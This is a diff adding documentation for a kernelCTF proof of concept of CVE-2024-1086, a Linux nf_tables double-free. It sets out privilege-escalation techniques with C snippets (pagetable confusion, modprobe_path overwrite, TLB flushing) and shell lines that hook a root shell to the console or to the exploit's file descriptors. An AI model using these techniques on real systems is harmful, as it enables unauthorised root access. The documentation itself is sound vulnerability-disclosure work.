google · koczkatamas · Sep 12, 2024 · Apr 3, 2024 · Apr 4, 2024 · Apr 4, 2024
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/exploit.md
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/img/pagesetup.svg b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/img/pagesetup.svg
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/novel-techniques.md
@@ -0,0 +1,199 @@
+# novel-techniques
+
+TODO: increase description granularity for techniques proven to be novel.
+
+## Bypassing KernelCTF mitigation instance corruption checks for skb's
+
+One of the mitigations in the KernelCTF mitigation instance validates the freelist next pointer whenever an object is allocated from a freelist.
+
+In the exploit, the following happens when doing the double-free:
+1. alloc skb1
+2. free skb1 (set new freelist pointer)
+3. modify skb->len (overlapping with freelist next pointer)
+4. free skb1 (set new freelist pointer)
+
+This means that at step 3 the freelist next pointer gets corrupted. `CONFIG_FREELIST_HARDENED` is left out of consideration here for demonstration purposes. When background applications on the system try to transmit packets, they will inevitably try to allocate the skb object with the corrupted freelist next pointer, causing a system crash.
+
+To bypass this, we leverage the fact that these corruption checks only happen on allocation, not on free. We can therefore mask the corrupted object by spraying "healthy" objects which get allocated instead. The sequence then looks like this:
+
+1. alloc N skb objects
+2. alloc skb1
+3. free skb1 (set new freelist pointer)
+4. modify skb->len (overlapping with freelist next pointer)
+5. free N skb objects
+6. free skb1 (set new freelist pointer)
+
+Whilst this is probably not the kind of vulnerability which freelist next pointer corruption detection is intended to mitigate, the detection would definitely mitigate exploitation in this specific scenario if it could not be bypassed.
+
+The fix for this technique would be checking the freelist next pointer of the previous object in the freelist when freeing an object.
+
+
+## Dirty Pagedirectory (pagetable confusion)
+
+Perhaps the most interesting technique in this exploit is Dirty Pagedirectory: plainly put, pagetable confusion between pagetables like PUD+PMD and PMD+PTE.
+
+The exploit double-allocates a PUD page and a PMD page, or a PMD page and a PTE page, so that pagetable entries can be set from userland pages. This yields a *very* powerful primitive, allowing the exploit to do rapid memory reads and writes across all physical memory of the system.
+
+Note how PT entries not only include the physical address (PFN), but also the page flags. Hence, we can write to read-only pages like the one holding modprobe_path. As if that isn't enough, we can set the target area to cover 1GiB (PMD+PTE) and/or 512GiB (PUD+PMD) of addresses at the same time. Of course, this can be limited to save memory usage and overhead.
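+
+The 1GiB and 512GiB figures follow from the x86-64 pagetable layout. The snippet below is a minimal sketch of that arithmetic, assuming 4KiB pages and 8-byte entries (512 entries per pagetable page). The helper `pagetable_page_coverage()` and both constants are hypothetical names used for illustration only.
+
+```c
+#include <stdint.h>
+
+#define PT_PAGE_SIZE        4096ULL /* assumed base page size */
+#define PT_ENTRIES_PER_PAGE 512ULL  /* 4096-byte page / 8-byte entry */
+
+/* bytes of address space mapped by one pagetable page at the given level:
+ * level 1 = PTE page, level 2 = PMD page, level 3 = PUD page */
+static uint64_t pagetable_page_coverage(unsigned int level)
+{
+	uint64_t bytes = PT_PAGE_SIZE;
+
+	while (level-- > 0)
+		bytes *= PT_ENTRIES_PER_PAGE;
+
+	return bytes;
+}
+```
+
+Under these assumptions a PTE page covers 2MiB, a PMD page covers 1GiB and a PUD page covers 512GiB.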
+
+
+## Freeing skb's instantly on arbitrary CPUs without UDP/TCP stacks
+
+In order to bypass certain double-free detections, we need to free skb's at specific times on specific CPUs. Additionally, we cannot make use of the UDP and TCP stacks in the kernel, since they access fields in the skb which are corrupted by the double-free.
+
+Fortunately, we can do this with the IPv4 fragment queues (IFQs). By sending an IPv4 fragment to localhost, we make it wait in an IFQ for `ipfrag_time` seconds, after which all fragments in the queue are freed. Alternatively, the fragments get freed when the IFQ is completed (i.e. the target length is reached with the fragments in the IFQ).
+
+If needed, we can prolong the lifetime of the IFQ by writing to `/proc/sys/net/ipv4/ipfrag_time`. 
+
+Unfortunately, the target length of the IFQ depends on skb->len, which is corrupted by the double-free. Hence, we cannot complete the IFQ normally. Instead, we trigger an error in the IFQ code, causing it to free all fragments in the queue on the CPU handling the triggering skb.
+
+It looks like this in action with the double-free:
+1. alloc skb1 (double-freed IPv4 fragment) @ CPU `X`
+2. free skb1 (1) @ CPU `X`
+3. make skb1 go into IFQ (utilizing its content)
+4. do stuff here, like spraying skb's, spraying PTEs, etc
+5. alloc skb2 (erroneous IPv4 fragment) @ CPU `Y`
+6. free skb2 @ CPU `Y`
+7. free skb1 @ CPU `Y`
+
+## Fileless privesc using fd hijacking
+
+We can escape the namespace by doing file descriptor hijacking: hooking up the file descriptors of another process (or `/dev/console`) to the root `/bin/sh` instance spawned through the `modprobe_path` technique.
+
+For example:
+- hijack `/dev/console` (works only on local TTYs): `/bin/sh 0</dev/console 1>/dev/console 2>&1`
+- hijack exploit fd's (works on reverse shells as well): `/bin/sh 0</proc/<exploit_pid>/fd/0 1>/proc/<exploit_pid>/fd/1 2>&1`
+
+This way we can do fileless privesc and escape the namespace without even writing a single file, allowing for privesc on read-only systems.
+
+## Fileless privesc using modprobe_path + procfs
+
+We can combine overwriting `modprobe_path` with procfs to allow for fileless privesc script execution as root from the root namespace. With this primitive, we can utilize fd hijacking to perform fileless namespace escapes.
+
+We can overwrite `modprobe_path` to `/proc/<exploit_pid>/fd/<privesc_script_fd>` and it will execute the privesc script completely from memory, allowing privesc on read-only systems.
+
+## TLB flushing with PCID enabled
+
+One of the things required for Dirty Pagedirectory is a working TLB flushing primitive. Assuming the target VMA is shared, we can fork() and munmap() that VMA in the child. This allows for 100% working TLB flushing regardless of PCID, without altering the original pagetables. I presume the process needs to be pinned to a CPU, to avoid flushing the TLB of the wrong CPU core.
+
+The code for this looks like:
+
+```c
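+#include <sys/mman.h>
+#include <unistd.h>
+
+// status values shared between parent and child (concrete values assumed here)
+#define FLUSH_STAT_INPROGRESS 0
+#define FLUSH_STAT_DONE 1
+
+// poll every 10ms while cmp holds (sleeps instead of busy-spinning)
+#define SPINLOCK(cmp) while (cmp) { usleep(10 * 1000); }
+
+// presumably needs to be CPU pinned
+static void flush_tlb(void *addr, size_t len)
+{
+	volatile short *status;
+
+	// shared anonymous mapping, so the child's write is visible to the parent
+	status = mmap(NULL, sizeof(short), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+	if (status == MAP_FAILED)
+		return;
+
+	*status = FLUSH_STAT_INPROGRESS;
+	if (fork() == 0)
+	{
+		// unmapping in the child triggers the flush, the parent's pagetables stay untouched
+		munmap(addr, len);
+		*status = FLUSH_STAT_DONE;
+		sleep(9999);
+	}
+
+	SPINLOCK(*status == FLUSH_STAT_INPROGRESS);
+
+	munmap((void *)status, sizeof(short));
+}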
+```
+
+Note that the child sleeps instead of exiting, to avoid certain kernel bugs when doing Dirty Pagedirectory.
+
+## Easing physical KASLR bruteforce
+
+It is possible to ease physical KASLR bruteforcing. The Linux kernel base is aligned to `CONFIG_PHYSICAL_START` (and/or `CONFIG_PHYSICAL_ALIGN`) bytes. This essentially means the Linux kernel must be aligned to 16MiB or 2MiB, reducing the number of possible base addresses from every address in physical memory (e.g. 8GiB worth of addresses on a system with 8GiB of physical memory) to 512 addresses with 16MiB alignment (a bruteforceable amount).
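+
+The reduction is plain division. The snippet below is a minimal sketch of that count, where `candidate_bases()` is a hypothetical helper and the memory size and alignment are the example values from the paragraph above.
+
+```c
+#include <stdint.h>
+
+#define MIB (1024ULL * 1024ULL)
+#define GIB (1024ULL * MIB)
+
+/* number of aligned physical addresses at which the kernel base could sit */
+static uint64_t candidate_bases(uint64_t phys_mem_bytes, uint64_t align_bytes)
+{
+	return phys_mem_bytes / align_bytes;
+}
+```
+
+For 8GiB of physical memory, `candidate_bases(8 * GIB, 16 * MIB)` gives 512 candidates, and `candidate_bases(8 * GIB, 2 * MIB)` gives 4096.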
+
+## Validating the correct modprobe_path
+
+We can validate if we found the correct `modprobe_path` object in physical memory (when using Dirty Pagedirectory), by checking if the output of `/proc/sys/kernel/modprobe` has changed to the new value, since it is a "real-time" reference to the `modprobe_path` object used in the kernel. 
+
+For example, this can be done with:
+
+```c
+static int get_modprobe_path(char *buf, size_t buflen)
+{
+	int size;
+
+	size = read_file("/proc/sys/kernel/modprobe", buf, buflen);
+
+	// nothing was read, so there is no trailing newline to strip
+	if (size <= 0)
+		return size;
+
+	if ((size_t)size == buflen)
+		printf("[*] ==== read max amount of modprobe_path bytes, perhaps increment KMOD_PATH_LEN? ====\n");
+
+	// replace the trailing newline (\x0a) with a NUL terminator
+	buf[size-1] = '\x00';
+
+	return size;
+}
+
+static int strcmp_modprobe_path(char *new_str)
+{
+	char buf[KMOD_PATH_LEN] = { '\x00' };
+
+	get_modprobe_path(buf, KMOD_PATH_LEN);
+
+	return strncmp(new_str, buf, KMOD_PATH_LEN);
+}
+
+void *memmem_modprobe_path(void *haystack_virt, size_t haystack_len, char *modprobe_path_str, size_t modprobe_path_len)
+{
+	void *pmd_modprobe_addr;
+
+	// search 0x200000 bytes (the range covered by a full PTE page) at a time for the modprobe_path signature
+	pmd_modprobe_addr = memmem(haystack_virt, haystack_len, modprobe_path_str, modprobe_path_len);
+	if (pmd_modprobe_addr == NULL)
+		return NULL;
+
+	// check if this is the actual modprobe by overwriting it, and checking /proc/sys/kernel/modprobe
+	strcpy(pmd_modprobe_addr, "/sanitycheck");
+	if (strcmp_modprobe_path("/sanitycheck") != 0)
+	{
+		printf("[-] ^false positive. skipping to next one\n");
+		return NULL;
+	}
+
+	return pmd_modprobe_addr;
+}
+```
+
+## Page refcount juggling
+
+When freeing a page, the Linux kernel checks if the page's refcount drops to 0. If it does not, the kernel will refuse to free the page. To bypass this behaviour we simply juggle the refcounts, by utilizing the following order of operations for the double-free:
+
+1. alloc obj1  | refcount 0 -> 1
+2. free obj1  | refcount 1 -> 0
+3. alloc obj2  | refcount 0 -> 1
+4. free obj1  | refcount 1 -> 0
+5. alloc obj3  | refcount 0 -> 1
+
+obj2 and obj3 will now be overlapping (having the same page), because the refcounts were always 0 when freeing.
+
+```c
+void __free_pages(struct page *page, unsigned int order)
+{
+	/* get PageHead before we drop reference */
+	int head = PageHead(page);
+
+	if (put_page_testzero(page))
+		free_the_page(page, order);
+	else if (!head)
+		while (order-- > 0)
+			free_the_page(page + (1 << order), order);
+}
+```
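+
+The five steps above can be replayed in a userland toy model. This is a minimal sketch and not kernel code: `struct toy_page`, `toy_alloc()`, `toy_free()` and `toy_juggle()` are hypothetical names, and the freelist is reduced to a small LIFO array. It only illustrates that each free sees the refcount drop from 1 to 0, so the zero check never rejects the second free.
+
+```c
+#include <stddef.h>
+
+struct toy_page { int refcount; };
+
+#define TOY_FREELIST_MAX 8
+static struct toy_page *toy_freelist[TOY_FREELIST_MAX];
+static size_t toy_free_count;
+
+/* models allocation: pop a page from the freelist and set its refcount to 1 */
+static struct toy_page *toy_alloc(void)
+{
+	struct toy_page *page;
+
+	if (toy_free_count == 0)
+		return NULL;
+
+	page = toy_freelist[--toy_free_count];
+	page->refcount = 1;
+	return page;
+}
+
+/* models the refcount check: only frees when the refcount drops to 0.
+ * returns 1 if the page was put back on the freelist */
+static int toy_free(struct toy_page *page)
+{
+	if (--page->refcount != 0)
+		return 0;
+
+	if (toy_free_count < TOY_FREELIST_MAX)
+		toy_freelist[toy_free_count++] = page;
+	return 1;
+}
+
+/* replays the five steps; returns 1 if obj2 and obj3 share the same page */
+static int toy_juggle(void)
+{
+	static struct toy_page page;
+	struct toy_page *obj1, *obj2, *obj3;
+
+	page.refcount = 0;
+	toy_free_count = 0;
+	toy_freelist[toy_free_count++] = &page;
+
+	obj1 = toy_alloc();	/* refcount 0 -> 1 */
+	toy_free(obj1);		/* refcount 1 -> 0 */
+	obj2 = toy_alloc();	/* refcount 0 -> 1 */
+	toy_free(obj1);		/* refcount 1 -> 0, through the stale obj1 pointer */
+	obj3 = toy_alloc();	/* refcount 0 -> 1 */
+
+	return obj2 == obj3;
+}
+```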
+
+## Double-free order 4 to order 0 (old: race condition)
+
+When double-freeing pages, we can convert the page order to 0 utilizing a race condition with a `WARN()` message on really slow systems (like QEMU VMs with synchronous terminals). In the new exploit, this has been replaced with PCP draining as this works on all systems.
+
+This allows us to double-allocate `order==0` pages whilst having a double-free primitive on `order==4` pages.
+
+## Double-free order X to order Y (new: PCP refill)
+
+When double-freeing pages, we can convert the page order to an arbitrary order by double-freeing pages with `order>=4`, such that they end up in the buddy allocator freelist. Then, we can move them into the PCP list of an arbitrary `order<=3` page freelist, by draining said PCP-freelist and refilling it with the pages from the buddy-freelist.
+
+This is the new variant of the race condition-based method.
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/docs/vulnerability.md
@@ -0,0 +1,47 @@
+# vulnerability
+
+Document containing information about the vulnerability, the requirements, and the affected Linux kernel versions.
+
+## technical details
+
+### outlines
+
+The root cause is an input sanitization bug in `nft_verdict_init()` (`net/netfilter/nf_tables_api.c:9814`), which allowed rule verdicts to return positive drop errors. This is classified as CVE-2024-1086.
+
+The impact of this is a stable double-free primitive on both `struct sk_buff` objects and `sk_buff->head` objects (kmalloc objects, ranging from size 256 to 65536 (assuming ipv4) a.k.a. order 4 buddy pages).
+
+The fix for the vulnerability was simply disallowing all drop errors in `nft_verdict_init()`, so that userland applications can no longer provide any drop errors. It did not make sense to the kernel developers that userland applications could do this in the first place, so they fully disabled it.
+
+### triggering the bug
+
+An exploit can create a rule containing an expression which sets the verdict to `0xFFFF0000`. 
+
+When this rule gets evaluated for an skb passing the nf_tables firewall, `nf_hook_slow()` attempts to free an skb object because `NF_DROP` is returned from the verdict mask of the rule verdict (`0xFFFF0000 (verdict) & 0x000000ff (NF_VERDICT_MASK) == 0 (NF_DROP)`). Then, `nf_hook_slow()` returns `NF_ACCEPT` (`NF_DROP_GETERR(0xFFFF0000) == NF_ACCEPT`) as if every hook/rule in the chain returned `NF_ACCEPT`. 
+
+This causes the caller of `nf_hook_slow()` to misinterpret the situation (it believes the packet has not been freed, and should be handled), and continue parsing the packet and eventually double-free both the skb object and its skb->head object.
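+
+The verdict arithmetic above can be reproduced in userland. The snippet below is a minimal sketch and not kernel code: the helpers `verdict_action()` and `drop_geterr()` are hypothetical names, and the constants mirror `NF_DROP`, `NF_ACCEPT`, `NF_VERDICT_MASK` and `NF_VERDICT_QBITS` from the kernel's netfilter headers. It assumes the compiler performs an arithmetic right shift on negative integers, as GCC and Clang do.
+
+```c
+#include <stdint.h>
+
+#define NF_DROP          0
+#define NF_ACCEPT        1
+#define NF_VERDICT_MASK  0x000000ffu
+#define NF_VERDICT_QBITS 16
+
+/* the action is encoded in the low byte of the verdict */
+static uint32_t verdict_action(uint32_t verdict)
+{
+	return verdict & NF_VERDICT_MASK;
+}
+
+/* models NF_DROP_GETERR(): the upper 16 bits read as a signed value, negated */
+static int drop_geterr(uint32_t verdict)
+{
+	return -((int32_t)verdict >> NF_VERDICT_QBITS);
+}
+```
+
+For the verdict `0xFFFF0000`, `verdict_action()` yields `NF_DROP` while `drop_geterr()` yields `NF_ACCEPT`, which is the mismatch described above.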
+
+## requirements
+
+Capabilities:
+- `CAP_NET_ADMIN`
+
+Kernel configuration:
+- `CONFIG_NF_TABLES=y`
+- `CONFIG_NETFILTER=y`
+
+User namespaces needed:
+- Yes, in order to set up rules for nf_tables to trigger the bug (`CAP_NET_ADMIN` in the current namespace should also be enough)
+
+## version info
+
+Commit which introduced the vuln: 
+- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e0abdadcc6e113ed2e22c85b35007
+
+Commit which fixed the vuln (revert of previous commit): 
+- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660
+
+Affected kernel versions: 
+- everything between `v3.5` and `v6.8-rc1`
+- excluding `v6.1.76` and higher on `v6.1.x`
+- excluding `v6.6.15` and higher on `v6.6.x`
+- excluding `v6.7.3` and higher on `v6.7.x`
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/Makefile b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/Makefile
@@ -0,0 +1,34 @@
+SRC_FILES := src/exploit.c src/env.c src/net.c src/nftnl.c src/file.c
+OUT_NAME = ./exploit
+
+# use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu
+#   and dynamically linking raised glibc ABI versioning errors
+CC = musl-gcc
+
+# use custom headers with fixed versions in a musl-gcc compatible manner
+# - ./include/libmnl: libmnl v1.0.5
+# - ./include/libnftnl: libnftnl v1.2.6
+# - ./include/linux-lts-6.1.72: linux v6.1.72
+CFLAGS = -I./include -I./include/linux-lts-6.1.72 -Wall -Wno-deprecated-declarations
+
+# use custom object archives compiled with musl-gcc for compatibility. normal ones 
+#   are used with gcc and have _chk funcs which musl doesn't support
+# the versions are the same as the headers above
+LIBMNL_PATH = ./lib/libmnl.a
+LIBNFTNL_PATH = ./lib/libnftnl.a
+
+exploit: _compile_static _strip_bin
+prerequisites: _install_musl
+run: _run_outfile
+clean: _clean_outfile
+
+_install_musl:
+	sudo apt-get install musl-tools
+_compile_static:
+	$(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH)
+_strip_bin:
+	strip $(OUT_NAME)
+_run_outfile:
+	$(OUT_NAME)
+_clean_outfile:
+	rm $(OUT_NAME)
diff --git a/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/exploit b/pocs/linux/kernelctf/CVE-2024-1086_lts_mitigation/exploit/lts-6.1.72/exploit